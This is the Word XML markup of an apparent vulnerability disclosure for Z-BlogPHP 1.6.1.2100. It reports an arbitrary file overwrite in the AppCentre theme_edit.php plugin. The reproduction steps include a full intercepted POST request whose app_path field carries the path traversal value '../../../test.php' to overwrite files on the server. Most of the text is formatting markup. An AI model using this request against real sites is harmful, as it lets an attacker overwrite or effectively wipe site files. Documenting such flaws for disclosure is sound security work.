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宋体" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7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FAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#Vulnerability title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> :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宋体" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7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>blogphp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.6.1.2100 (Valyria)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>has an arbitrary file coverage vulnerability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eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7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FAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28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t>Any file overlay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FAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability Version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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.6.1.2100 (Valyria)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FAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Recurring environment: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 xml:space="preserve">Windows 10*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caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7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 xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7.3.4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>Apache 2.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>39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>#</w:t>
      </w:r>
      <w:r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  <w:t>Vulnerability Description AND recurrence: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Download and install here, the installation process will not be detailed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https://github.com/zblogcn/zblogphp/releases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 xml:space="preserve">Open the file and find line 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84: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/>
          <w:bCs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zb_users\plugin\AppCentre\theme_edit.php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675" cy="221107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We can see that there is a write file operation here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And we can control </w:t>
      </w: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app_path</w:t>
      </w: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app_id</w:t>
      </w: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in the path.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Although we can't control the content, we can make the content of all files of the whole website the same, so as to achieve the effect of arbitrary file deletion.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The reason is found, so let's see how to use it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The first step is to open the website and log in to the background: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our_url/zb_system/login.php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2607310"/>
            <wp:effectExtent l="0" t="0" r="508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Second, open the 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url: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 w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs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our_url/zb_users/plugin/AppCentre/theme_edit.php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40614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Then we type anything and intercept the packet using tools like burp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283718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 xml:space="preserve">In the third step, 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e create an empty PHP file in the root of the site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74041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 xml:space="preserve">Then we modify </w:t>
      </w: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app_path</w:t>
      </w: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 xml:space="preserve"> in the packet to look like this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298386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POST /zb_users/plugin/AppCentre/theme_edit.php HTTP/1.1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Host: www.dmsj.com:8081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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/x-www-form-urlencoded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Content-Length: 521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Origin: http://www.dmsj.com:8081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Connection: close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Referer: http://www.dmsj.com:8081/zb_users/plugin/AppCentre/theme_edit.php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Cookie: timezone=8; username=admin; token=4df546d48f20749584e1490f24524c9ed85b5bacf215c66af9774c9de55e3a8a1605685033; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D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Upgrade-Insecure-Requests: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token=5131d7fedadffe91d09ed9c6b49af975&amp;app_id=sadfa&amp;app_name=cascsa&amp;app_url=ewgwe&amp;app_note=nhtt&amp;app_adapted=162100&amp;app_version1=1&amp;app_version2=0&amp;app_version3=&amp;app_pubdate=2020-11-17&amp;app_modified=2020-11-17&amp;app_author_name=umky&amp;app_author_email=fedfv%40gmail.com&amp;app_author_url=sfavv&amp;app_source_name=&amp;app_source_email=&amp;app_source_url=&amp;app_path=../../../test.php&amp;app_include=&amp;app_level=1&amp;app_phpver=5.2&amp;app_price=0&amp;app_advanced_dependency=&amp;app_advanced_conflict=&amp;app_advanced_rewritefunctions=&amp;app_advanced_existsfunctions=&amp;app_description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Then find the test.php The files have changed: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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="717550"/>
            <wp:effectExtent l="0" t="0" r="2540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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3125470"/>
            <wp:effectExtent l="0" t="0" r="5715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AFAFAF"/>
          <w:spacing w:val="7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  <w:t>If this happens when you send packets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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AFAFAF"/>
          <w:spacing w:val="7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3337560"/>
            <wp:effectExtent l="0" t="0" r="444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 xml:space="preserve">Please change </w:t>
      </w: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app_id</w:t>
      </w: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 xml:space="preserve"> to any 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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="13970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61B4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5FD61B4F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="26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551E"/>
    <w:rsid w:val="03DD0443"/>
    <w:rsid w:val="05000A3B"/>
    <w:rsid w:val="083046FE"/>
    <w:rsid w:val="096E6B39"/>
    <w:rsid w:val="09BE6424"/>
    <w:rsid w:val="0C2A3B6F"/>
    <w:rsid w:val="0E100C80"/>
    <w:rsid w:val="15036002"/>
    <w:rsid w:val="161468FD"/>
    <w:rsid w:val="1D2241C2"/>
    <w:rsid w:val="1F691FA4"/>
    <w:rsid w:val="20191B6F"/>
    <w:rsid w:val="26D552F4"/>
    <w:rsid w:val="2A6457D5"/>
    <w:rsid w:val="32152478"/>
    <w:rsid w:val="32C0561E"/>
    <w:rsid w:val="33D6315B"/>
    <w:rsid w:val="34A54B43"/>
    <w:rsid w:val="350C57FD"/>
    <w:rsid w:val="37AA35BA"/>
    <w:rsid w:val="38571045"/>
    <w:rsid w:val="3A0832A6"/>
    <w:rsid w:val="3AB54BE9"/>
    <w:rsid w:val="3B6B6C09"/>
    <w:rsid w:val="3EF86CF2"/>
    <w:rsid w:val="411262CC"/>
    <w:rsid w:val="45B71293"/>
    <w:rsid w:val="45CB722F"/>
    <w:rsid w:val="477D087F"/>
    <w:rsid w:val="4BF66BEC"/>
    <w:rsid w:val="4E1403D7"/>
    <w:rsid w:val="515E3DD4"/>
    <w:rsid w:val="51D84496"/>
    <w:rsid w:val="599230C1"/>
    <w:rsid w:val="5C7B20D2"/>
    <w:rsid w:val="5CEB3A3C"/>
    <w:rsid w:val="5E9831AB"/>
    <w:rsid w:val="637B238A"/>
    <w:rsid w:val="65A6607E"/>
    <w:rsid w:val="65E43095"/>
    <w:rsid w:val="6D2D003F"/>
    <w:rsid w:val="6F2D1B06"/>
    <w:rsid w:val="71622723"/>
    <w:rsid w:val="75C80EA5"/>
    <w:rsid w:val="776D5677"/>
    <w:rsid w:val="7A360F0C"/>
    <w:rsid w:val="7A3D3232"/>
    <w:rsid w:val="7C777174"/>
    <w:rsid w:val="7F215B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听她说</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-17T08:45:34Z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